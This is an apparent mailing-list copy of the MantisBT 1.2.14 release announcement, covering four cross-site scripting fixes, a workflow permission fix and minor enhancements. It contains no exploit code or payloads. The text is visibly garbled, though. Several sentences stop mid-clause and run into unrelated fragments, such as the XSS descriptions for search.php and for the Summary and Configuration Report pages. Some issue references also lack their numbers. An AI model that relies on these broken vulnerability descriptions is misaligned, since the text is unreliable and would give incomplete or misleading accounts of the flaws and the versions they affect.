Blog Post: http://www.mantisbt.org/blog/?p=244
MantisBT 1.2.14 is a security update for the stable 1.2.x branch.
All installations that are currently running any 1.2.x version are strongly
advised to upgrade to this release.
The following release notes are relative to 1.2.12 (rather than 1.2.13).
Four cross site scripting (XSS) vulnerability issues were discovered
- A malicious person could trick a target user’s browser into
critical, due to the affected page (search.php) being usable anonymously on
public-facing installations (i.e. without the need for a user login).
Affects MantisBT 1.2.12 only (earlier versions are not impacted). Refer
to issue #15373 <http://www.mantisbt.org/bugs/view.php?id=15373> for
- A user holding manager/administrator permissions could create a
visitors to (a) the Summary page (summary.php) as well as (b) the
Configuration Report page (adm_config_report.php), are exposed to having
this issue is mitigated by the need to have a privileged account to modify
category and project names. Issue (a) affects MantisBT version 1.2.12 and
above, while (b) is on 1.2.13 only; earlier releases are not impacted.
Refer to issues #15384 <http://www.mantisbt.org/bugs/view.php?id=15384> (a)
and#15415 <http://www.mantisbt.org/bugs/view.php?id=15415> (b) for
- An administrator could enter a configuration option containing
Configuration Report page (adm_config_report.php). The severity of this
issue is mitigated by the need to have a privileged account. Affects all
MantisBT 1.2.x versions. Refer to issue
A workflow-related security issue was also fixed:
- A user with “Reporter” permissions can modify the workflow status of
any issue to “New” even if they do not have the necessary privileges to
make this change. Refer to issue
In addition to the corrections for the above-mentioned security issues,
this release also includes several bug fixes and enhancements:
- improved Manage Configuration page (better performance, ability to
filter and edit config options)
- support for the built-in SOAP extension in addition to nusoap
- updated translations in many languages
A full changelog for 1.2.14 can be found at
Go ahead and download <http://www.mantisbt.org/download.php> it now.
Checkout Hosted MantisBT <http://www.mantisbt.org/hosting.php> to be up and
running in minutes. For optimized access to MantisBT from iPhone, Android
and Windows Phone checkout MantisTouch <http://www.mantistouch.org/>.